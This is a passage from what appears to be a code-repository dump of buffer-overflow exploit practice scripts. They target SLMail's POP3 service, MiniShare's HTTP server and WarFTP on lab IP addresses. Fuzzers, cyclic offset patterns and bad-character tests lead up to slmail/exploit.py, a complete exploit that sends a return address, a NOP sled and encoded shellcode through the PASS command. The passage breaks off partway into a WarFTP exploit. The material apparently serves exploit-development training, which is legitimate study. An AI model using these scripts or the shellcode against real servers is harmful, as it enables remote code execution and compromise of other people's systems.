#buff="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co" 26 | buff+="A"*1787 + "B" * 4 + C * 4 + badchars 27 | 28 | buff+=" HTTP/1.1\r\n\r\n" 29 | s.send(buff) 30 | s.close() 31 | 32 | -------------------------------------------------------------------------------- /second/minishare/minisharetwo.py: -------------------------------------------------------------------------------- 1 | #!/usr/share/python 2 | import socket,sys 3 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 4 | s.connect(('11.11.11.6',80)) 5 | buff="GET " 6 | #buff+="A"*2000 7 | 8 | buff+="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co" 9 | 10 | 11 | buff+=" HTTP/1.1\r\n\r\n" 12 | s.send(buff) 13 | s.close() 14 | 15 | -------------------------------------------------------------------------------- /second/slmail/badchars.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 4 | #5F4A358F 5 | ret = "\x8F\x35\x4A\x5F" 6 | buffer = 'A' * 2606 + 'B' * 4 + badchars 7 | try: 8 | print "\nSending evil buffer..." 9 | s.connect(('11.11.11.9',110)) 10 | data = s.recv(1024) 11 | s.send('USER username' +'\r\n') 12 | data = s.recv(1024) 13 | s.send('PASS ' + buffer + '\r\n') 14 | print "\nDone!." 15 | except: 16 | print "Could not connect to POP3!" 17 | 18 | 19 | 20 | -------------------------------------------------------------------------------- /second/slmail/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 4 | #5F4A358F 5 | ret = "\x8F\x35\x4A\x5F" 6 | nops = "\x90" * 16 7 | shellcode = ("\xdd\xc4\xd9\x74\x24\xf4\x5a\xbe\xe1\x1a\xb7\x3d\x31\xc9\xb1" 8 | "\x52\x83\xea\xfc\x31\x72\x13\x03\x93\x09\x55\xc8\xaf\xc6\x1b" 9 | "\x33\x4f\x17\x7c\xbd\xaa\x26\xbc\xd9\xbf\x19\x0c\xa9\xed\x95" 10 | "\xe7\xff\x05\x2d\x85\xd7\x2a\x86\x20\x0e\x05\x17\x18\x72\x04" 11 | "\x9b\x63\xa7\xe6\xa2\xab\xba\xe7\xe3\xd6\x37\xb5\xbc\x9d\xea" 12 | "\x29\xc8\xe8\x36\xc2\x82\xfd\x3e\x37\x52\xff\x6f\xe6\xe8\xa6" 13 | "\xaf\x09\x3c\xd3\xf9\x11\x21\xde\xb0\xaa\x91\x94\x42\x7a\xe8" 14 | "\x55\xe8\x43\xc4\xa7\xf0\x84\xe3\x57\x87\xfc\x17\xe5\x90\x3b" 15 | "\x65\x31\x14\xdf\xcd\xb2\x8e\x3b\xef\x17\x48\xc8\xe3\xdc\x1e" 16 | "\x96\xe7\xe3\xf3\xad\x1c\x6f\xf2\x61\x95\x2b\xd1\xa5\xfd\xe8" 17 | "\x78\xfc\x5b\x5e\x84\x1e\x04\x3f\x20\x55\xa9\x54\x59\x34\xa6" 18 | "\x99\x50\xc6\x36\xb6\xe3\xb5\x04\x19\x58\x51\x25\xd2\x46\xa6" 19 | "\x4a\xc9\x3f\x38\xb5\xf2\x3f\x11\x72\xa6\x6f\x09\x53\xc7\xfb" 20 | "\xc9\x5c\x12\xab\x99\xf2\xcd\x0c\x49\xb3\xbd\xe4\x83\x3c\xe1" 21 | "\x15\xac\x96\x8a\xbc\x57\x71\xbe\x4b\x5c\x83\xa8\x49\x62\x82" 22 | "\x93\xc7\x84\xee\xf3\x81\x1f\x87\x6a\x88\xeb\x36\x72\x06\x96" 23 | "\x79\xf8\xa5\x67\x37\x09\xc3\x7b\xa0\xf9\x9e\x21\x67\x05\x35" 24 | "\x4d\xeb\x94\xd2\x8d\x62\x85\x4c\xda\x23\x7b\x85\x8e\xd9\x22" 25 | "\x3f\xac\x23\xb2\x78\x74\xf8\x07\x86\x75\x8d\x3c\xac\x65\x4b" 26 | "\xbc\xe8\xd1\x03\xeb\xa6\x8f\xe5\x45\x09\x79\xbc\x3a\xc3\xed" 27 | "\x39\x71\xd4\x6b\x46\x5c\xa2\x93\xf7\x09\xf3\xac\x38\xde\xf3" 28 | "\xd5\x24\x7e\xfb\x0c\xed\x9e\x1e\x84\x18\x37\x87\x4d\xa1\x5a" 29 | "\x38\xb8\xe6\x62\xbb\x48\x97\x90\xa3\x39\x92\xdd\x63\xd2\xee" 30 | "\x4e\x06\xd4\x5d\x6e\x03") 31 | 32 | buffer = 'A' * 2606 + ret + nops + shellcode 33 | try: 34 | print "\nSending evil buffer..." 35 | s.connect(('11.11.11.9',110)) 36 | data = s.recv(1024) 37 | s.send('USER username' +'\r\n') 38 | data = s.recv(1024) 39 | s.send('PASS ' + buffer + '\r\n') 40 | print "\nDone!." 41 | except: 42 | print "Could not connect to POP3!" 43 | 44 | 45 | 46 | -------------------------------------------------------------------------------- /second/slmail/fuzzer.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 4 | buffer = 'A' * 2700 5 | try: 6 | print "\nSending evil buffer..." 7 | s.connect(('11.11.11.9',110)) 8 | data = s.recv(1024) 9 | s.send('USER username' +'\r\n') 10 | data = s.recv(1024) 11 | s.send('PASS ' + buffer + '\r\n') 12 | print "\nDone!." 13 | except: 14 | print "Could not connect to POP3!" 15 | 16 | 17 | 18 | -------------------------------------------------------------------------------- /second/slmail/offsetcalc.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 4 | 5 | buffer = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9" 6 | 7 | try: 8 | print "\nSending evil buffer..." 9 | s.connect(('11.11.11.9',110)) 10 | data = s.recv(1024) 11 | s.send('USER username' +'\r\n') 12 | data = s.recv(1024) 13 | s.send('PASS ' + buffer + '\r\n') 14 | print "\nDone!." 15 | except: 16 | print "Could not connect to POP3!" 17 | 18 | 19 | 20 | -------------------------------------------------------------------------------- /second/slmail/slmail.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/freddiebarrsmith/Buffer-Overflow-Exploit-Development-Practice/ef3426ace0f4c4fc9fce612eba811a9c8988bb66/second/slmail/slmail.exe -------------------------------------------------------------------------------- /second/slmail/verifyoffset.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 4 | buffer = 'A' * 2606 + 'B' * 4 + 'C' * 90 5 | try: 6 | print "\nSending evil buffer..." 7 | s.connect(('11.11.11.9',110)) 8 | data = s.recv(1024) 9 | s.send('USER username' +'\r\n') 10 | data = s.recv(1024) 11 | s.send('PASS ' + buffer + '\r\n') 12 | print "\nDone!." 13 | except: 14 | print "Could not connect to POP3!" 15 | 16 | 17 | 18 | -------------------------------------------------------------------------------- /second/warftp/badchars.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | #buffer = "A" * 1100 4 | #buffer = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk" 5 | #[*] Exact match at offset 485 6 | #0x7c86467b 7 | badchars = "" 8 | badchars += "\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20" 9 | badchars += "\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30" 10 | badchars += "\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" 11 | badchars += "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50" 12 | badchars += "\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60" 13 | badchars += "\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70" 14 | badchars += "\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80" 15 | badchars += "\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90" 16 | badchars += "\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0" 17 | badchars += "\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0" 18 | badchars += "\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0" 19 | badchars += "\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0" 20 | badchars += "\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0" 21 | badchars += "\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0" 22 | badchars += "\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" 23 | 24 | 25 | 26 | ret = "\x7b\x46\x86\7b" 27 | buffer = "A" * 485 + ret + "\x90" * 15 + badchars 28 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 29 | connect=s.connect(('11.11.11.6',21)) 30 | response = s.recv(1024) 31 | print response 32 | s.send('USER ' + buffer + '\r\n') 33 | response = s.recv(1024) 34 | print response 35 | s.send('PASS PASSWORD\r\n') 36 | s.close() 37 | 38 | -------------------------------------------------------------------------------- /second/warftp/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | #buffer = "A" * 1100 4 | #buffer = 